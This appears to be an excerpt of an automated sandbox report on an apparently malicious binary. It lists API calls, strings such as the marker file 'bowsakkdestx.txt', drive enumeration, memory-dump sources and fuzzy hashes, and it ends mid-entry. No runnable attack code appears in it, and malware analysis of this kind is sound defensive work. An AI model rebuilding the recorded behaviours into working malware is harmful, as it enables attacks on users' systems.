                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00F51726
                                                                                                        • _strlen.LIBCMT ref: 00F51734
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        • _strnlen.LIBCMT ref: 00F517BF
                                                                                                        • __lock.LIBCMT ref: 00F517D0
                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00F517DB
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2168648987-0
                                                                                                        • Opcode ID: 52f221c46194768ef5df1df29a4dc47dd32c118e3b44631fb4f4c6c95b03b85a
                                                                                                        • Instruction ID: 8fe45847a179d9a1e3c72d60b94104e8734e2bdf51909a82e2245d216d8f5fbb
                                                                                                        • Opcode Fuzzy Hash: 52f221c46194768ef5df1df29a4dc47dd32c118e3b44631fb4f4c6c95b03b85a
                                                                                                        • Instruction Fuzzy Hash: 59310832901615ABDB216B6CAC01B9F3694BF09B32F140115FE14EB181DB7CE90877E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00F20A75
                                                                                                        • SetErrorMode.KERNEL32(00000001,01010234,00000002), ref: 00F20AE2
                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 00F20AF9
                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00F20B02
                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00F20B1B
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                        • String ID:
                                                                                                        • API String ID: 2560635915-0
                                                                                                        • Opcode ID: 01e60ed292c15764f32963c7253d00b71392df2536b8461bbd712b59c535816f
                                                                                                        • Instruction ID: 4528dab7ec18181b1be229a1f4ce72e9b8f0e8b023a05a9e869841815360edb5
                                                                                                        • Opcode Fuzzy Hash: 01e60ed292c15764f32963c7253d00b71392df2536b8461bbd712b59c535816f
                                                                                                        • Instruction Fuzzy Hash: 084112725083409FC710DF68D885B0BBBE5FB89728F400A2DF085972A2DBB9C644CB93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F4B70B
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: HeapAlloc.KERNEL32(00C00000,00000000,00000001,?,?,?,?,00F33B69,?), ref: 00F30CA5
                                                                                                        • _free.LIBCMT ref: 00F4B71E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocHeap_free_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2734353464-0
                                                                                                        • Opcode ID: 5acffc6d3482853ac073a56d5e783a9bd2a65b3e8835ef4f35b714c81fb2c4bb
                                                                                                        • Instruction ID: e997774a2bc46a52020599e57a7869bdce1cf829744a2b7bc8fb9ca0b744b098
                                                                                                        • Opcode Fuzzy Hash: 5acffc6d3482853ac073a56d5e783a9bd2a65b3e8835ef4f35b714c81fb2c4bb
                                                                                                        • Instruction Fuzzy Hash: 4411A33280971AABDB313F74AC45B6A3F94AF84770F104626FC94A6152DB38D840B7D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00F2F085
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2F0AC
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2F0B6
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2F0C4
                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00F2F0D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: a44948d771143ea86287aa39d9e8f29fcb84e97e802f91f3d7cf2dc31bf4c040
                                                                                                        • Instruction ID: 9faf11597b1600051277c41f79166800a908067d39fcd4f0e2d40a96bcb3e2df
                                                                                                        • Opcode Fuzzy Hash: a44948d771143ea86287aa39d9e8f29fcb84e97e802f91f3d7cf2dc31bf4c040
                                                                                                        • Instruction Fuzzy Hash: FB01A731A5131D66EB309B65EC46F96376DBB48B10F604022FA00AF1C1D6B9A409DBD4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00F2E515
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2E53C
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2E546
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2E554
                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00F2E562
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 39ca21055d3ba7cffc330222f6bad985d8c4621294c76baf55d27e999f10a0ac
                                                                                                        • Instruction ID: 4e929cbdba2a881915f4357394389e67da8a0a3dfc07c0703552db4d8319d38c
                                                                                                        • Opcode Fuzzy Hash: 39ca21055d3ba7cffc330222f6bad985d8c4621294c76baf55d27e999f10a0ac
                                                                                                        • Instruction Fuzzy Hash: 0501F731B5031A76EA309B60EC46F967B6DA748B04F640011FA00EB0D1D6B9A409D7D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00F2FA53
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FA71
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2FA7B
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FA89
                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00F2FA94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction ID: 0b5941db8a3e9ab7dc95ae4da6166710f1ccf100a1f9c23c847fb60c6870b0f8
                                                                                                        • Opcode Fuzzy Hash: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction Fuzzy Hash: 1301D631B50319B7EB209B64DC4AFA63B6DAB44B10F104021FA04AE1C1D7E5A804DAE0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00F2FE03
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FE21
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2FE2B
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FE39
                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00F2FE44
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction ID: 1f30717d283c1dfa8883156ebd5d356ccb979f168ba00534c78f7a44760c5429
                                                                                                        • Opcode Fuzzy Hash: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction Fuzzy Hash: 4301A231A50319A7EB215B64AC4AFA63B6DAB44B10F004021FA00AE1D1D7E5A805D6E0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: $+$0123456789ABCDEF
                                                                                                        • API String ID: 1302938615-1400378107
                                                                                                        • Opcode ID: 218050c5ed09510fca15dea428b7b7d474878d93d5e444f6633b35b8add61255
                                                                                                        • Instruction ID: faf36368b816c2b7db2699642c5e902e7cdd3be0df575f8a070333b9bf211c04
                                                                                                        • Opcode Fuzzy Hash: 218050c5ed09510fca15dea428b7b7d474878d93d5e444f6633b35b8add61255
                                                                                                        • Instruction Fuzzy Hash: 1981ACB2A0C7508FD710DF29D840A2BBBE5BFC8758F18095DF999A3212D735ED019B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 6c8d8af49d24de20e7742f5de8840626b7edbf69024c08df1d4a2f50f310f94a
                                                                                                        • Instruction ID: 20d4a139b1a498d84ca1bf7418397b5cd6f8bd7bec90050687a03bfab30a5ace
                                                                                                        • Opcode Fuzzy Hash: 6c8d8af49d24de20e7742f5de8840626b7edbf69024c08df1d4a2f50f310f94a
                                                                                                        • Instruction Fuzzy Hash: 2C51D9727083249FDB24EE2CEC80A6A77A6EF84710B24891DF855CB345DB31DC54EB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: a55db05f342a075af9c4e2ebf03b864ca221c71a10829b5c76f09da41166b564
                                                                                                        • Instruction ID: 80886920f2c0d735aeecfdd8dc9532419afbca31b0f023ae1cab7c165829d81c
                                                                                                        • Opcode Fuzzy Hash: a55db05f342a075af9c4e2ebf03b864ca221c71a10829b5c76f09da41166b564
                                                                                                        • Instruction Fuzzy Hash: 20310831700224DBDB28DE4DEC8192A77A6EF807107204A1CF865CB2C5D7B1FD40ABA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: .\crypto\buffer\buffer.c
                                                                                                        • API String ID: 2102423945-294840303
                                                                                                        • Opcode ID: 65d7fba60d131b7be1b51a8c1a8cb50101ab85b68233e85854a341431fc063a9
                                                                                                        • Instruction ID: fd9cb28329cfa78af43791671519ecd601f3c95e8de6540e42f46b7e5fa17189
                                                                                                        • Opcode Fuzzy Hash: 65d7fba60d131b7be1b51a8c1a8cb50101ab85b68233e85854a341431fc063a9
                                                                                                        • Instruction Fuzzy Hash: AF2137B6B403213FE210AA5DFC52B26B399EB94B24F004125F318EB2C2E6B1F810D7D5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 00F1C687
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                        • Opcode ID: 7f5831a240ba6d0770ee46826e43988be048e17fa39b1130145cba323ab87fba
                                                                                                        • Instruction ID: 3692359b37ad628ba5c2ed4c19f019c70fe27ca536c69e637e9cfa9dee7ab9bb
                                                                                                        • Opcode Fuzzy Hash: 7f5831a240ba6d0770ee46826e43988be048e17fa39b1130145cba323ab87fba
                                                                                                        • Instruction Fuzzy Hash: 9E213B72208341ABD720DF28DC04BABBBE9EF81754F004A2EF48987291D775D544E7D2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1C48B
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1C4A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 29327785-2616962270
                                                                                                        • Opcode ID: 92765f5adcf27b80a0b036f6bf0065c55e76cf63e7aa44e7294001f41f466e4e
                                                                                                        • Instruction ID: 88649ff8781f4c58ce3ea22232c4fec9fd691870b9759665ce7d6bdb87310217
                                                                                                        • Opcode Fuzzy Hash: 92765f5adcf27b80a0b036f6bf0065c55e76cf63e7aa44e7294001f41f466e4e
                                                                                                        • Instruction Fuzzy Hash: 43014972A8022C33DE30B6A4AC47FFFB35C8B51731F000197FE08D6180E6A58986B6D1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00F2BA4A
                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00F2BA73
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                        • String ID: 0$LPCWSTRszWindowClass
                                                                                                        • API String ID: 1693014935-1496217519
                                                                                                        • Opcode ID: 02904a343081b95e8ffcc9e41433c46ceb8cde470cc4e6a041191ad17667ec98
                                                                                                        • Instruction ID: 6c60ca5677076bf3815c526cc9e2e498db1c9879f4d7b8363cbe2b704573a627
                                                                                                        • Opcode Fuzzy Hash: 02904a343081b95e8ffcc9e41433c46ceb8cde470cc4e6a041191ad17667ec98
                                                                                                        • Instruction Fuzzy Hash: 8FF062B0C0531D9BEB00DFD5D9597DEBBB4BB08709F104259D9147A280D7BA1608CFD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1C438
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1C44E
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F1C45B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
